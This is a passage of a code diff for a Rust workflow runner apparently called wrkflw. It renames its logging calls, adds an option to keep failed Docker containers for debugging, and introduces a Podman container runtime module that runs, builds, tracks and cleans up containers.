Err(ContainerError::ContainerExecution(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
@@ -612,7 +666,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::warning(&format!(
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Pull of image {} timed out, continuing with existing image",
|
||||
image
|
||||
));
|
||||
@@ -630,7 +684,7 @@ impl ContainerRuntime for DockerRuntime {
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::error(&format!(
|
||||
wrkflw_logging::error(&format!(
|
||||
"Building image {} timed out after 120 seconds",
|
||||
tag
|
||||
));
|
||||
@@ -804,9 +858,9 @@ impl DockerRuntime {
|
||||
// Convert command vector to Vec<String>
|
||||
let cmd_vec: Vec<String> = cmd.iter().map(|&s| s.to_string()).collect();
|
||||
|
||||
logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
|
||||
logging::debug(&format!("Environment: {:?}", env));
|
||||
logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
|
||||
wrkflw_logging::debug(&format!("Environment: {:?}", env));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
|
||||
// Determine platform-specific configurations
|
||||
let is_windows_image = image.contains("windows")
|
||||
@@ -941,7 +995,7 @@ impl DockerRuntime {
|
||||
_ => -1,
|
||||
},
|
||||
Err(_) => {
|
||||
logging::warning("Container wait operation timed out, treating as failure");
|
||||
wrkflw_logging::warning("Container wait operation timed out, treating as failure");
|
||||
-1
|
||||
}
|
||||
};
|
||||
@@ -971,26 +1025,36 @@ impl DockerRuntime {
|
||||
}
|
||||
}
|
||||
} else {
|
||||
logging::warning("Retrieving container logs timed out");
|
||||
wrkflw_logging::warning("Retrieving container logs timed out");
|
||||
}
|
||||
|
||||
// Clean up container with a timeout
|
||||
let _ = tokio::time::timeout(
|
||||
std::time::Duration::from_secs(10),
|
||||
self.docker.remove_container(&container.id, None),
|
||||
)
|
||||
.await;
|
||||
untrack_container(&container.id);
|
||||
// Clean up container with a timeout, but preserve on failure if configured
|
||||
if exit_code == 0 || !self.preserve_containers_on_failure {
|
||||
let _ = tokio::time::timeout(
|
||||
std::time::Duration::from_secs(10),
|
||||
self.docker.remove_container(&container.id, None),
|
||||
)
|
||||
.await;
|
||||
untrack_container(&container.id);
|
||||
} else {
|
||||
// Container failed and we want to preserve it for debugging
|
||||
wrkflw_logging::info(&format!(
|
||||
"Preserving container {} for debugging (exit code: {}). Use 'docker exec -it {} bash' to inspect.",
|
||||
container.id, exit_code, container.id
|
||||
));
|
||||
// Still untrack it from the automatic cleanup system to prevent it from being cleaned up later
|
||||
untrack_container(&container.id);
|
||||
}
|
||||
|
||||
// Log detailed information about the command execution for debugging
|
||||
if exit_code != 0 {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Docker command failed with exit code: {}",
|
||||
exit_code
|
||||
));
|
||||
logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
logging::debug(&format!("STDERR: {}", stderr));
|
||||
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("STDERR: {}", stderr));
|
||||
}
|
||||
|
||||
Ok(ContainerOutput {
|
||||
File diff suppressed because it is too large
Load Diff
@@ -1,8 +1,8 @@
|
||||
use crate::matrix::MatrixCombination;
|
||||
use crate::parser::workflow::WorkflowDefinition;
|
||||
use chrono::Utc;
|
||||
use serde_yaml::Value;
|
||||
use std::{collections::HashMap, fs, io, path::Path};
|
||||
use wrkflw_matrix::MatrixCombination;
|
||||
use wrkflw_parser::workflow::WorkflowDefinition;
|
||||
|
||||
pub fn setup_github_environment_files(workspace_dir: &Path) -> io::Result<()> {
|
||||
// Create necessary directories
|
||||
@@ -1,11 +1,16 @@
|
||||
// executor crate
|
||||
|
||||
#![allow(unused_variables, unused_assignments)]
|
||||
|
||||
pub mod dependency;
|
||||
pub mod docker;
|
||||
pub mod engine;
|
||||
pub mod environment;
|
||||
pub mod podman;
|
||||
pub mod substitution;
|
||||
|
||||
// Re-export public items
|
||||
pub use docker::cleanup_resources;
|
||||
pub use engine::{execute_workflow, JobResult, JobStatus, RuntimeType, StepResult, StepStatus};
|
||||
pub use engine::{
|
||||
execute_workflow, ExecutionConfig, JobResult, JobStatus, RuntimeType, StepResult, StepStatus,
|
||||
};
|
||||
877
crates/executor/src/podman.rs
Normal file
877
crates/executor/src/podman.rs
Normal file
@@ -0,0 +1,877 @@
|
||||
use async_trait::async_trait;
|
||||
use once_cell::sync::Lazy;
|
||||
use std::collections::HashMap;
|
||||
use std::path::Path;
|
||||
use std::process::Stdio;
|
||||
use std::sync::Mutex;
|
||||
use tempfile;
|
||||
use tokio::process::Command;
|
||||
use wrkflw_logging;
|
||||
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use wrkflw_utils;
|
||||
use wrkflw_utils::fd;
|
||||
|
||||
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
|
||||
// Map to track customized images for a job
|
||||
#[allow(dead_code)]
|
||||
static CUSTOMIZED_IMAGES: Lazy<Mutex<HashMap<String, String>>> =
|
||||
Lazy::new(|| Mutex::new(HashMap::new()));
|
||||
|
||||
pub struct PodmanRuntime {
|
||||
preserve_containers_on_failure: bool,
|
||||
}
|
||||
|
||||
impl PodmanRuntime {
|
||||
pub fn new() -> Result<Self, ContainerError> {
|
||||
Self::new_with_config(false)
|
||||
}
|
||||
|
||||
pub fn new_with_config(preserve_containers_on_failure: bool) -> Result<Self, ContainerError> {
|
||||
// Check if podman command is available
|
||||
if !is_available() {
|
||||
return Err(ContainerError::ContainerStart(
|
||||
"Podman is not available on this system".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
Ok(PodmanRuntime {
|
||||
preserve_containers_on_failure,
|
||||
})
|
||||
}
|
||||
|
||||
// Add a method to store and retrieve customized images (e.g., with Python installed)
|
||||
#[allow(dead_code)]
|
||||
pub fn get_customized_image(base_image: &str, customization: &str) -> Option<String> {
|
||||
let key = format!("{}:{}", base_image, customization);
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
pub fn set_customized_image(base_image: &str, customization: &str, new_image: &str) {
|
||||
let key = format!("{}:{}", base_image, customization);
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
/// Find a customized image key by prefix
|
||||
#[allow(dead_code)]
|
||||
pub fn find_customized_image_key(image: &str, prefix: &str) -> Option<String> {
|
||||
let image_keys = match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(keys) => keys,
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
return None;
|
||||
}
|
||||
};
|
||||
|
||||
// Look for any key that starts with the prefix
|
||||
for (key, _) in image_keys.iter() {
|
||||
if key.starts_with(prefix) {
|
||||
return Some(key.clone());
|
||||
}
|
||||
}
|
||||
|
||||
None
|
||||
}
|
||||
|
||||
/// Get a customized image with language-specific dependencies
|
||||
pub fn get_language_specific_image(
|
||||
base_image: &str,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
) -> Option<String> {
|
||||
let key = match (language, version) {
|
||||
("python", Some(ver)) => format!("python:{}", ver),
|
||||
("node", Some(ver)) => format!("node:{}", ver),
|
||||
("java", Some(ver)) => format!("eclipse-temurin:{}", ver),
|
||||
("go", Some(ver)) => format!("golang:{}", ver),
|
||||
("dotnet", Some(ver)) => format!("mcr.microsoft.com/dotnet/sdk:{}", ver),
|
||||
("rust", Some(ver)) => format!("rust:{}", ver),
|
||||
(lang, Some(ver)) => format!("{}:{}", lang, ver),
|
||||
(lang, None) => lang.to_string(),
|
||||
};
|
||||
|
||||
match CUSTOMIZED_IMAGES.lock() {
|
||||
Ok(images) => images.get(&key).cloned(),
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Set a customized image with language-specific dependencies
|
||||
pub fn set_language_specific_image(
|
||||
base_image: &str,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
new_image: &str,
|
||||
) {
|
||||
let key = match (language, version) {
|
||||
("python", Some(ver)) => format!("python:{}", ver),
|
||||
("node", Some(ver)) => format!("node:{}", ver),
|
||||
("java", Some(ver)) => format!("eclipse-temurin:{}", ver),
|
||||
("go", Some(ver)) => format!("golang:{}", ver),
|
||||
("dotnet", Some(ver)) => format!("mcr.microsoft.com/dotnet/sdk:{}", ver),
|
||||
("rust", Some(ver)) => format!("rust:{}", ver),
|
||||
(lang, Some(ver)) => format!("{}:{}", lang, ver),
|
||||
(lang, None) => lang.to_string(),
|
||||
};
|
||||
|
||||
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
|
||||
images.insert(key, new_image.to_string());
|
||||
}) {
|
||||
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
/// Execute a podman command with proper error handling and timeout
|
||||
async fn execute_podman_command(
|
||||
&self,
|
||||
args: &[&str],
|
||||
input: Option<&str>,
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout
|
||||
|
||||
let result = tokio::time::timeout(timeout_duration, async {
|
||||
let mut cmd = Command::new("podman");
|
||||
cmd.args(args);
|
||||
|
||||
if input.is_some() {
|
||||
cmd.stdin(Stdio::piped());
|
||||
}
|
||||
cmd.stdout(Stdio::piped()).stderr(Stdio::piped());
|
||||
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Running Podman command: podman {}",
|
||||
args.join(" ")
|
||||
));
|
||||
|
||||
let mut child = cmd.spawn().map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to spawn podman command: {}", e))
|
||||
})?;
|
||||
|
||||
// Send input if provided
|
||||
if let Some(input_data) = input {
|
||||
if let Some(stdin) = child.stdin.take() {
|
||||
use tokio::io::AsyncWriteExt;
|
||||
let mut stdin = stdin;
|
||||
stdin.write_all(input_data.as_bytes()).await.map_err(|e| {
|
||||
ContainerError::ContainerExecution(format!(
|
||||
"Failed to write to stdin: {}",
|
||||
e
|
||||
))
|
||||
})?;
|
||||
stdin.shutdown().await.map_err(|e| {
|
||||
ContainerError::ContainerExecution(format!("Failed to close stdin: {}", e))
|
||||
})?;
|
||||
}
|
||||
}
|
||||
|
||||
let output = child.wait_with_output().await.map_err(|e| {
|
||||
ContainerError::ContainerExecution(format!("Podman command failed: {}", e))
|
||||
})?;
|
||||
|
||||
Ok(ContainerOutput {
|
||||
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
|
||||
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
|
||||
exit_code: output.status.code().unwrap_or(-1),
|
||||
})
|
||||
})
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(output) => output,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Podman operation timed out after 360 seconds");
|
||||
Err(ContainerError::ContainerExecution(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub fn is_available() -> bool {
|
||||
// Use a very short timeout for the entire availability check
|
||||
let overall_timeout = std::time::Duration::from_secs(3);
|
||||
|
||||
// Spawn a thread with the timeout to prevent blocking the main thread
|
||||
let handle = std::thread::spawn(move || {
|
||||
// Use safe FD redirection utility to suppress Podman error messages
|
||||
match fd::with_stderr_to_null(|| {
|
||||
// First, check if podman CLI is available as a quick test
|
||||
if cfg!(target_os = "linux") || cfg!(target_os = "macos") {
|
||||
// Try a simple podman version command with a short timeout
|
||||
let process = std::process::Command::new("podman")
|
||||
.arg("version")
|
||||
.arg("--format")
|
||||
.arg("{{.Version}}")
|
||||
.stdout(std::process::Stdio::null())
|
||||
.stderr(std::process::Stdio::null())
|
||||
.spawn();
|
||||
|
||||
match process {
|
||||
Ok(mut child) => {
|
||||
// Set a very short timeout for the process
|
||||
let status = std::thread::scope(|_| {
|
||||
// Try to wait for a short time
|
||||
for _ in 0..10 {
|
||||
match child.try_wait() {
|
||||
Ok(Some(status)) => return status.success(),
|
||||
Ok(None) => {
|
||||
std::thread::sleep(std::time::Duration::from_millis(100))
|
||||
}
|
||||
Err(_) => return false,
|
||||
}
|
||||
}
|
||||
// Kill it if it takes too long
|
||||
let _ = child.kill();
|
||||
false
|
||||
});
|
||||
|
||||
if !status {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug("Podman CLI is not available");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Try to run a simple podman command to check if the daemon is responsive
|
||||
let runtime = match tokio::runtime::Builder::new_current_thread()
|
||||
.enable_all()
|
||||
.build()
|
||||
{
|
||||
Ok(rt) => rt,
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!(
|
||||
"Failed to create runtime for Podman availability check: {}",
|
||||
e
|
||||
));
|
||||
return false;
|
||||
}
|
||||
};
|
||||
|
||||
runtime.block_on(async {
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(2), async {
|
||||
let mut cmd = Command::new("podman");
|
||||
cmd.args(["info", "--format", "{{.Host.Hostname}}"]);
|
||||
cmd.stdout(Stdio::null()).stderr(Stdio::null());
|
||||
|
||||
match tokio::time::timeout(std::time::Duration::from_secs(1), cmd.output())
|
||||
.await
|
||||
{
|
||||
Ok(Ok(output)) => {
|
||||
if output.status.success() {
|
||||
true
|
||||
} else {
|
||||
wrkflw_logging::debug("Podman info command failed");
|
||||
false
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => {
|
||||
wrkflw_logging::debug(&format!("Podman info command error: {}", e));
|
||||
false
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug("Podman info command timed out after 1 second");
|
||||
false
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug("Podman availability check timed out");
|
||||
false
|
||||
}
|
||||
}
|
||||
})
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability",
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
// Manual implementation of join with timeout
|
||||
let start = std::time::Instant::now();
|
||||
|
||||
while start.elapsed() < overall_timeout {
|
||||
if handle.is_finished() {
|
||||
return match handle.join() {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning("Podman availability check thread panicked");
|
||||
false
|
||||
}
|
||||
};
|
||||
}
|
||||
std::thread::sleep(std::time::Duration::from_millis(50));
|
||||
}
|
||||
|
||||
wrkflw_logging::warning(
|
||||
"Podman availability check timed out, assuming Podman is not available",
|
||||
);
|
||||
false
|
||||
}
|
||||
|
||||
// Add container to tracking
|
||||
pub fn track_container(id: &str) {
|
||||
if let Ok(mut containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.push(id.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
// Remove container from tracking
|
||||
pub fn untrack_container(id: &str) {
|
||||
if let Ok(mut containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.retain(|c| c != id);
|
||||
}
|
||||
}
|
||||
|
||||
// Clean up all tracked resources
|
||||
pub async fn cleanup_resources() {
|
||||
// Use a global timeout for the entire cleanup process
|
||||
let cleanup_timeout = std::time::Duration::from_secs(5);
|
||||
|
||||
match tokio::time::timeout(cleanup_timeout, cleanup_containers()).await {
|
||||
Ok(result) => {
|
||||
if let Err(e) = result {
|
||||
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
|
||||
}
|
||||
}
|
||||
Err(_) => wrkflw_logging::warning(
|
||||
"Podman cleanup timed out, some resources may not have been removed",
|
||||
),
|
||||
}
|
||||
}
|
||||
|
||||
// Clean up all tracked containers
|
||||
pub async fn cleanup_containers() -> Result<(), String> {
|
||||
// Getting the containers to clean up should not take a long time
|
||||
let containers_to_cleanup =
|
||||
match tokio::time::timeout(std::time::Duration::from_millis(500), async {
|
||||
match RUNNING_CONTAINERS.try_lock() {
|
||||
Ok(containers) => containers.clone(),
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Could not acquire container lock for cleanup");
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
{
|
||||
Ok(containers) => containers,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
|
||||
vec![]
|
||||
}
|
||||
};
|
||||
|
||||
if containers_to_cleanup.is_empty() {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up {} containers",
|
||||
containers_to_cleanup.len()
|
||||
));
|
||||
|
||||
// Process each container with a timeout
|
||||
for container_id in containers_to_cleanup {
|
||||
// First try to stop the container
|
||||
let stop_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["stop", &container_id])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match stop_result {
|
||||
Ok(Ok(output)) => {
|
||||
if output.status.success() {
|
||||
wrkflw_logging::debug(&format!("Stopped container: {}", container_id));
|
||||
} else {
|
||||
wrkflw_logging::warning(&format!("Error stopping container {}", container_id));
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error stopping container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
|
||||
}
|
||||
}
|
||||
|
||||
// Then try to remove it
|
||||
let remove_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", &container_id])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match remove_result {
|
||||
Ok(Ok(output)) => {
|
||||
if output.status.success() {
|
||||
wrkflw_logging::debug(&format!("Removed container: {}", container_id));
|
||||
} else {
|
||||
wrkflw_logging::warning(&format!("Error removing container {}", container_id));
|
||||
}
|
||||
}
|
||||
Ok(Err(e)) => wrkflw_logging::warning(&format!(
|
||||
"Error removing container {}: {}",
|
||||
container_id, e
|
||||
)),
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
|
||||
}
|
||||
}
|
||||
|
||||
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
|
||||
untrack_container(&container_id);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for PodmanRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
cmd: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
// Print detailed debugging info
|
||||
wrkflw_logging::info(&format!("Podman: Running container with image: {}", image));
|
||||
|
||||
let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout
|
||||
|
||||
// Run the entire container operation with a timeout
|
||||
match tokio::time::timeout(
|
||||
timeout_duration,
|
||||
self.run_container_inner(image, cmd, env_vars, working_dir, volumes),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error("Podman operation timed out after 360 seconds");
|
||||
Err(ContainerError::ContainerExecution(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
// Add a timeout for pull operations
|
||||
let timeout_duration = std::time::Duration::from_secs(30);
|
||||
|
||||
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Pull of image {} timed out, continuing with existing image",
|
||||
image
|
||||
));
|
||||
// Return success to allow continuing with existing image
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
// Add a timeout for build operations
|
||||
let timeout_duration = std::time::Duration::from_secs(120); // 2 minutes timeout for builds
|
||||
|
||||
match tokio::time::timeout(timeout_duration, self.build_image_inner(dockerfile, tag)).await
|
||||
{
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::error(&format!(
|
||||
"Building image {} timed out after 120 seconds",
|
||||
tag
|
||||
));
|
||||
Err(ContainerError::ImageBuild(
|
||||
"Operation timed out".to_string(),
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// Check if we already have a customized image for this language and version
|
||||
let key = format!("{}-{}", language, version.unwrap_or("latest"));
|
||||
if let Some(customized_image) = Self::get_language_specific_image("", language, version) {
|
||||
return Ok(customized_image);
|
||||
}
|
||||
|
||||
// Create a temporary Dockerfile for customization
|
||||
let temp_dir = tempfile::tempdir().map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to create temp directory: {}", e))
|
||||
})?;
|
||||
|
||||
let dockerfile_path = temp_dir.path().join("Dockerfile");
|
||||
let mut dockerfile_content = String::new();
|
||||
|
||||
// Add language-specific setup based on the language
|
||||
match language {
|
||||
"python" => {
|
||||
let base_image =
|
||||
version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" build-essential \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN pip install {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"node" => {
|
||||
let base_image =
|
||||
version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" build-essential \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN npm install -g {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"java" => {
|
||||
let base_image = version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
});
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" maven \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
}
|
||||
"go" => {
|
||||
let base_image =
|
||||
version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" git \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN go install {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"dotnet" => {
|
||||
let base_image = version
|
||||
.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
});
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content
|
||||
.push_str(&format!("RUN dotnet tool install -g {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
"rust" => {
|
||||
let base_image =
|
||||
version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v));
|
||||
dockerfile_content.push_str(&format!("FROM {}\n\n", base_image));
|
||||
dockerfile_content.push_str(
|
||||
"RUN apt-get update && apt-get install -y --no-install-recommends \\\n",
|
||||
);
|
||||
dockerfile_content.push_str(" build-essential \\\n");
|
||||
dockerfile_content.push_str(" && rm -rf /var/lib/apt/lists/*\n");
|
||||
|
||||
if let Some(packages) = additional_packages {
|
||||
for package in packages {
|
||||
dockerfile_content.push_str(&format!("RUN cargo install {}\n", package));
|
||||
}
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)));
|
||||
}
|
||||
}
|
||||
|
||||
// Write the Dockerfile
|
||||
std::fs::write(&dockerfile_path, dockerfile_content).map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to write Dockerfile: {}", e))
|
||||
})?;
|
||||
|
||||
// Build the customized image
|
||||
let image_tag = format!("wrkflw-{}-{}", language, version.unwrap_or("latest"));
|
||||
self.build_image(&dockerfile_path, &image_tag).await?;
|
||||
|
||||
// Store the customized image
|
||||
Self::set_language_specific_image("", language, version, &image_tag);
|
||||
|
||||
Ok(image_tag)
|
||||
}
|
||||
}
|
||||
|
||||
// Implementation of internal methods
|
||||
impl PodmanRuntime {
|
||||
async fn run_container_inner(
|
||||
&self,
|
||||
image: &str,
|
||||
cmd: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
wrkflw_logging::debug(&format!("Running command in Podman: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Environment: {:?}", env_vars));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
|
||||
// Generate a unique container name
|
||||
let container_name = format!("wrkflw-{}", uuid::Uuid::new_v4());
|
||||
|
||||
// Build the podman run command and store temporary strings
|
||||
let working_dir_str = working_dir.to_string_lossy().to_string();
|
||||
let mut env_strings = Vec::new();
|
||||
let mut volume_strings = Vec::new();
|
||||
|
||||
// Prepare environment variable strings
|
||||
for (key, value) in env_vars {
|
||||
env_strings.push(format!("{}={}", key, value));
|
||||
}
|
||||
|
||||
// Prepare volume mount strings
|
||||
for (host_path, container_path) in volumes {
|
||||
volume_strings.push(format!(
|
||||
"{}:{}",
|
||||
host_path.to_string_lossy(),
|
||||
container_path.to_string_lossy()
|
||||
));
|
||||
}
|
||||
|
||||
let mut args = vec!["run", "--name", &container_name, "-w", &working_dir_str];
|
||||
|
||||
// Only use --rm if we don't want to preserve containers on failure
|
||||
// When preserve_containers_on_failure is true, we skip --rm so failed containers remain
|
||||
if !self.preserve_containers_on_failure {
|
||||
args.insert(1, "--rm"); // Insert after "run"
|
||||
}
|
||||
|
||||
// Add environment variables
|
||||
for env_string in &env_strings {
|
||||
args.push("-e");
|
||||
args.push(env_string);
|
||||
}
|
||||
|
||||
// Add volume mounts
|
||||
for volume_string in &volume_strings {
|
||||
args.push("-v");
|
||||
args.push(volume_string);
|
||||
}
|
||||
|
||||
// Add the image
|
||||
args.push(image);
|
||||
|
||||
// Add the command
|
||||
args.extend(cmd);
|
||||
|
||||
// Track the container (even though we use --rm, track it for consistency)
|
||||
track_container(&container_name);
|
||||
|
||||
// Execute the command
|
||||
let result = self.execute_podman_command(&args, None).await;
|
||||
|
||||
// Handle container cleanup based on result and settings
|
||||
match &result {
|
||||
Ok(output) => {
|
||||
if output.exit_code == 0 {
|
||||
// Success - always clean up successful containers
|
||||
if self.preserve_containers_on_failure {
|
||||
// We didn't use --rm, so manually remove successful container
|
||||
let cleanup_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", &container_name])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match cleanup_result {
|
||||
Ok(Ok(cleanup_output)) => {
